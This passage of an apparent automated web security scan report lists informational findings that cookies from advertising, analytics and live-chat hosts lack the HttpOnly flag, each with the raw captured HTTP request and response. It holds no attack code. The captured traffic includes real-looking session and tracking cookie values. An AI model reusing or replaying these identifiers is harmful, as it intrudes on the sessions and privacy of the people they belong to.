GET /a.gif?t=0&id=0RwmgFWNcm0FxUpmSwaz&si=3452826&pcid=1091345&ei=RMX&ci=10733823&p=840&s=http%3A%2F%2Fomg%2Eyahoo%2Ecom%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl29tzy55ywhvby5jb20vbmv3cy9hy3ryzxnzzxmtdghhdc1oyxzllxbsyxllzc15b3vuz2vylwfuzc1vbgrlci12zxjzaw9ucy1vzi1hlwnoyxjhy3rlci1pbi10agutc2ftzs1tb3zpzs81nje5oq%3D%3D%26token%3Deb731ec6c7937dc&reqid=1316220820&cat=31 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?5jBaAAKVGAD.yKMAAAAAAPwrKAAAAAAAAgAEAAIAAAAAAP8AAAAGFIUOHgAAAAAAEacQAAAAAACarzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRQIAAAAAAAIAAwAAAAAAzczMzMzMIEAAAAAAAAA2QM3MzMzMzCBAAAAAAAAANkDNzMzMzMwgQAAAAAAAADZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADrqdlAFNS8Cjy7X-rGaEQDUVZWwA..T0lAs1kFAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15r02p9vu%2FM%3D787833.14445112.14291879.10366300%2FD%3Do_m_g%2FS%3D2115806991%3ALREC%2FY%3DYAHOO%2FEXP%3D1316228019%2FL%3DmQQbJ2KIOPrpARpjTl.wjR_8Mhd7ak5z75MAB.cM%2FB%3DeV1RS9BDRyA-%2FJ%3D1316220819570445%2FK%3D_ZbShBrEtzuJa.XgV8rN3w%2FA%3D6261235%2FR%3D0%2F%2A%24,http%3A%2F%2Fomg.yahoo.com%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl29tzy55ywhvby5jb20vbmv3cy9hy3ryzxnzzxmtdghhdc1oyxzllxbsyxllzc15b3vuz2vylwfuzc1vbgrlci12zxjzaw9ucy1vzi1hlwnoyxjhy3rlci1pbi10agutc2ftzs1tb3zpzs81nje5oq%3D%3D%26token%3Deb731ec6c7937dc,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445112%26Z%3D300x250%26_PVID%3DmQQbJ2KIOPrpARpjTl.wjR%255f8Mhd7ak5z75MAB.cM%26_salt%3D2060818614%26cb%3D1316220819570445%26i%3D148950%26r%3D0,7ba8fdda-e0c7-11e0-89db-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchappnexus=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:53 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Mon, 16-Sep-13 00:55:53 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 iad061104000000 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

12.95. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibmwebsphere.tt.omtrdc.net
Path:   /m2/ibmwebsphere/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=software_global_top&mboxId=0&mboxTime=1316203012179&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:55:56 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 1639
Date: Fri, 16 Sep 2011 19:55:55 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('software_global_top',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defa
...[SNIP]...

12.96. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; USCC=ONE; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.97. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5GkyNdLlOAHuA%2DbmdnsGYiJD4QNpeccgY%2DRDQSBGLm2PPg7d28AQgjG0B8gFxlJeKM05kmkWWPmmn5mxlbx6SvbPaU06g1NaBiwh1p0iek9X7%2EjP4pBpngHaPu6fulcD5JF457M1ipDvM7PRTHfbnTWiIqnQcEnwOFMFfNU2HkqLzzN6rzcoGX%2ESEeGoarqPrQsrbVZlY0pbqX1BgOmVUg%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220738_1316220738684:0654349316815871; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 539

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5Gk
...[SNIP]...

12.98. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5GkyNdLlOAHuA%2DbmdnsGYiJD4QNpeccgY%2DRDQSBGLm2PPg7d28AQgjG0B8gFxlJeKM05kmkWWPmmn5mxlbx6SvbPaU06g1NaBiwh1p0iek9X7%2EjP4pBpngHaPu6fulcD5JF457M1ipDvM7PRTHfbnTWiIqnQcEnwOFMFfNU2HkqLzzN6rzcoGX%2ESEeGoarqPrQsrbVZlY0pbqX1BgOmVUg%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1316220738_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



12.99. http://info.mailtraq.com/142/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /142/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /142/ HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/wac
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1583%2Dreferer=http%3A%2F%2Fduckduckgo%2Ecom%2F%3Fq%3Dimap%2Bserver; ASPSESSIONIDQQSDCQTS=EJBHPKFBKMPAIDFPJELDBDIJ; __utma=224494342.1969248356.1316220641.1316220641.1316220641.1; __utmc=224494342; __utmz=224494342.1316220641.1.1.utmcsr=info.mailtraq.com|utmccn=(referral)|utmcmd=referral|utmcct=/imap; __utmb=224494342.1.10.1316220641; 1583-query=; 1583%2Duserid=%2D3830349; __utma=248930399.1287691746.1316220202.1316220202.1316220202.1; __utmb=248930399.2.10.1316220202; __utmc=248930399; __utmz=248930399.1316220202.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 145
Content-Type: text/html
Location: http://www.enstarllc.com
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:08 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.enstarllc.com">here</a>.</body>

12.100. http://info.mailtraq.com/716/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /716/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /716/ HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/imap
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1583-query=; 1583%2Duserid=%2D3830349; 1583%2Dreferer=http%3A%2F%2Fduckduckgo%2Ecom%2F%3Fq%3Dimap%2Bserver; ASPSESSIONIDQQSDCQTS=EJBHPKFBKMPAIDFPJELDBDIJ; __utma=248930399.1287691746.1316220202.1316220202.1316220202.1; __utmb=248930399.1.10.1316220202; __utmc=248930399; __utmz=248930399.1316220202.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://www.mailtraq.com/30day
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:49:45 GMT


12.101. http://info.mailtraq.com/imap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /imap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imap HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:42:31 GMT
Connection: close

<html><head><title>IMAP Server in the Mailtraq email server</title><meta name="description" content="Mailtraq's IMAP Server provides a complete IMAP implementation offering a powerful remote mail stor
...[SNIP]...

12.102. http://info.mailtraq.com/wac  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /wac

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wac HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://www.mailtraq.com/30day
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1583%2Dreferer=http%3A%2F%2Fduckduckgo%2Ecom%2F%3Fq%3Dimap%2Bserver; ASPSESSIONIDQQSDCQTS=EJBHPKFBKMPAIDFPJELDBDIJ; __utma=248930399.1287691746.1316220202.1316220202.1316220202.1; __utmb=248930399.1.10.1316220202; __utmc=248930399; __utmz=248930399.1316220202.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; 1583-query=; 1583%2Duserid=%2D3830349; __utma=224494342.1969248356.1316220641.1316220641.1316220641.1; __utmc=224494342; __utmz=224494342.1316220641.1.1.utmcsr=info.mailtraq.com|utmccn=(referral)|utmcmd=referral|utmcct=/imap; __utmb=224494342.1.10.1316220641

Response

HTTP/1.1 200
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:01 GMT
Connection: close

<html><head><title>Proxy Server in the Mailtraq email server</title><meta name="author" content="neatComponents" /><meta http-equiv="imagetoolbar" content="no" /><meta http-equiv="Content-Type" conten
...[SNIP]...

12.103. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&betr=attwired11_cs=[+]1[720],3[8760] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 01:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=qo/cOJoII0bSFA3skjAfqaAcm5nqGgK; domain=advertising.com; expires=Mon, 16-Sep-2013 01:38:50 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 17 Sep 2011 02:38:50 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

12.104. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&betr=attwired11_cs=[+]1[720],3[8760] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 01:10:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 16-Sep-2013 01:10:21 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 17 Sep 2011 02:10:21 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

12.105. http://livechat.iadvize.com/chat_init.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /chat_init.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1821vvc=2; vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:54:40 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; expires=Sun, 15-Sep-2013 21:54:40 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A2%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A2000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A0.03%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42095

if(typeof(iAdvize) !== 'object'){
   
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
   var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
   var newNode = docume
...[SNIP]...

12.106. http://livechat.iadvize.com/rpc/referrer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /rpc/referrer.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rpc/referrer.php?s=1821&get=&random=1316228161329 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; 1821vvc=3; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%7D; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:54:41 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D; path=/
Vary: Accept-Encoding
Content-Length: 173

iAdvize.vStats['origin_site'] = '';iAdvize.vStats['origin'] = 'direct';iAdvize.vStats['refengine'] = '';iAdvize.vStats['refkeyword'] = '';iAdvize.util.delScript('referrer');

12.107. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=071&j=0&buid=55785307-A5DC-4E3A-B452-DDBD426D3A1D HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
